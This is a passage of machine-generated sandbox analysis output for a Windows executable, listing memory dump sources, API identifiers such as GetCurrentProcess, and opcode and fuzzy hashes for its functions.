                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                          • Instruction ID: 60433ccabc176123ad07ddc4619e9aa4061b9e010e0524656f07e3669a56ac0c
                                          • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                          • Instruction Fuzzy Hash: CE31C422B29D4282EA606A2FD9407F8A350BF66BD4F840531DF1D57BB8DE3CD8428670
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Item_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 1746051919-0
                                          • Opcode ID: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                                          • Instruction ID: 4b9a016ca110f38cbbab1b0ea506052a22154e4db660bbd60c31f3468a1c16d0
                                          • Opcode Fuzzy Hash: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                                          • Instruction Fuzzy Hash: A031B221A18B8186EA10AB1DF4443AAF360FBA6790F805235EF9D07BBDDF3CE4448714
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushTime
                                          • String ID:
                                          • API String ID: 1392018926-0
                                          • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                          • Instruction ID: d29582644351eb505ff6905714114f29f40f63e714cbc790b2e8ff150fd82623
                                          • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                          • Instruction Fuzzy Hash: 5F210522E1DF4250EA62AE1ED4043FA9790BF23794F954034DF4C06ABDEE7CD586C620
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: LoadString
                                          • String ID:
                                          • API String ID: 2948472770-0
                                          • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                          • Instruction ID: 3c5e7e6559553b073c5c963fc60a49fc9523839b864a4824b54e4d693d6c856b
                                          • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                          • Instruction Fuzzy Hash: 06115171B0864589FA14AF2EA8401A9F7A1BBAAFC0B944435CF5D93B38DE7CE5418354
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                          • Instruction ID: a3bb1093b4725e708b16ca013a76445ba95be987df75e2eab05d1597483d5185
                                          • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                          • Instruction Fuzzy Hash: E311A821A18A4181FB50AB2EE8402BAA250FB66B74F940331DF7D066FCCF3CD596C710
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7BB24EBAD,?,?,?,?,00007FF7BB245752,?,?,?,00007FF7BB2456DE), ref: 00007FF7BB24EB5C
                                          • GetProcessAffinityMask.KERNEL32 ref: 00007FF7BB24EB6F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Process$AffinityCurrentMask
                                          • String ID:
                                          • API String ID: 1231390398-0
                                          • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                          • Instruction ID: b52300c77c4443b51eb9554180bc3789f178e4d14aaf2048b3cd41d602a8cc15
                                          • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                          • Instruction Fuzzy Hash: B1E02B61F2458642DF0DAF5FC4404E9B392BFD9B40BC48035DB0B83A2CDE2CE6458B00
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                          • String ID:
                                          • API String ID: 1173176844-0
                                          • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                          • Instruction ID: e516d2983402fb174d6b124c4a75fde9c5928536a9cd50b2a09f761e12cb1f95
                                          • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                          • Instruction Fuzzy Hash: 53E0B640E0D60746F918726D18261F481506F3F371EA81B70DF7F842EFAE2CA4968170
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                                          • String ID:
                                          • API String ID: 588628887-0
                                          • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                          • Instruction ID: c8e4da377f44ca5877804e93a064b8cf2706d9809f9970b504fd8170eb577c16
                                          • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                          • Instruction Fuzzy Hash: 7CE04F50E0A10742FF097BBF58451F492907FBE790B840030CF0ECA27ADE2CA4819220
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: d9984bf57418443c007321115317a4667c9375466ee7e8bcba90f6b0858b89e4
                                          • Instruction ID: 0b550a1d333aa4e5b16cab73d993f2cf1c502e6b4f381d00d41cf0bbb709c594
                                          • Opcode Fuzzy Hash: d9984bf57418443c007321115317a4667c9375466ee7e8bcba90f6b0858b89e4
                                          • Instruction Fuzzy Hash: D2D1DC72B1868159EB28AB2D95402F8F7A1FB26B84F840435CF1D477B9CF3CE5658720
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 1017591355-0
                                          • Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                          • Instruction ID: 6edbc8c1f937381876b07aba911e8bf2ff9e60b5c6ffda15b17317aaef736265
                                          • Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                          • Instruction Fuzzy Hash: 5261F111E0C64781FA60BA2DC4152FAD691BF67BD4F940531EF8E4AEFDEE6CE4418221
                                          APIs
                                            • Part of subcall function 00007FF7BB24E948: ReleaseSemaphore.KERNEL32 ref: 00007FF7BB24E974
                                            • Part of subcall function 00007FF7BB24E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF7BB24E993
                                            • Part of subcall function 00007FF7BB24E948: DeleteCriticalSection.KERNEL32 ref: 00007FF7BB24E9AA
                                            • Part of subcall function 00007FF7BB24E948: CloseHandle.KERNEL32 ref: 00007FF7BB24E9B7
                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB251ACB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 1624603282-0
                                          • Opcode ID: c684d41f894cbce08ec7c0bd704efad723705596a2152b884b75cef801a19205
                                          • Instruction ID: 4fd8bd5a28bdaa820444fd947e91050d79243328e5870a1190276a4a9ef9d396
                                          • Opcode Fuzzy Hash: c684d41f894cbce08ec7c0bd704efad723705596a2152b884b75cef801a19205
                                          • Instruction Fuzzy Hash: 95619362715A8552EE08EB6DD5941FCB365FF52F94B944132EB2D07AE9CF38E460C310
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: d66c1927c3180f61a8f193b24c26b61e470edbacf4cd296cf9515bfe84d3ca03
                                          • Instruction ID: c8d1f70a977f6ca3d580922aa722530070077fe7954c66e407779898747f50b5
                                          • Opcode Fuzzy Hash: d66c1927c3180f61a8f193b24c26b61e470edbacf4cd296cf9515bfe84d3ca03
                                          • Instruction Fuzzy Hash: 3E51A462A0864644EA14BB2D94453EDA751FB67BD4F840136EF5D077BACE3DE489C330
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: 3598c53805056eb61f078e6229763af278814205c6aa80cf8595c445c1d2a3c6
                                          • Instruction ID: 4b542d2bdb495a05146bf4920f59d853e9f374579553940709a6ae3e7b3fd1ed
                                          • Opcode Fuzzy Hash: 3598c53805056eb61f078e6229763af278814205c6aa80cf8595c445c1d2a3c6
                                          • Instruction Fuzzy Hash: 50411762B18A9142EA14AA1FEA013B9E651FB59FC0F848535EF4D4BFAEDF7CD4518300
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                                          • Instruction ID: da649dc8f7ca41b267103683b2a1dd5bd43bbef71d023c2db8b247c22621060a
                                          • Opcode Fuzzy Hash: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                                          • Instruction Fuzzy Hash: 7741F562A18B4181EF14AB2DE5453B9B360FB66BD4F941234EF5D07ABDDF3DE4408620
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                          • String ID:
                                          • API String ID: 680105476-0
                                          • Opcode ID: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
                                          • Instruction ID: dd31c27fd006693e0914d3082ba244ad0c6faec0201d578a0e4684ca50d748ae
                                          • Opcode Fuzzy Hash: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
                                          • Instruction Fuzzy Hash: F221B722A0875189EA146F5DA4002F9A250FB26BF0F940730DF3D47BE9DE7CE4558315
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: 9569f84151419388535ac001b279a0a92bf5c5167c25002bdc660d405c57631f
                                          • Instruction ID: ac40a460d73d7853af2ff4a74b0ac4bfe13a62656d27169fe628a219d06ee5a4
                                          • Opcode Fuzzy Hash: 9569f84151419388535ac001b279a0a92bf5c5167c25002bdc660d405c57631f
                                          • Instruction Fuzzy Hash: DA214F22B1498666EA08FB2DD5543F8A324FB66784FD44431EB1D476BADF3CA568C320
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo
                                          • String ID:
                                          • API String ID: 3215553584-0
                                          • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                          • Instruction ID: d13a21de9cd9e7756d05e0bb2f4ac88c2020987a04c4c3b353ff451620e4f51a
                                          • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                          • Instruction Fuzzy Hash: 1C117231D1C65282F710AF5EA4412B9E2A4FF66380FD40135EF8D876A9DF2CE8008728
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                          • Instruction ID: 4383382c34e37d06b7c179bb3c9fdba64ebd7cae3f4d6f2a536a8a584061f15b
                                          • Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                          • Instruction Fuzzy Hash: B501A162E18AC585FA11A72CE4452A9B362FBAA790FC05231EF9C07ABDDF2CD1448614
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
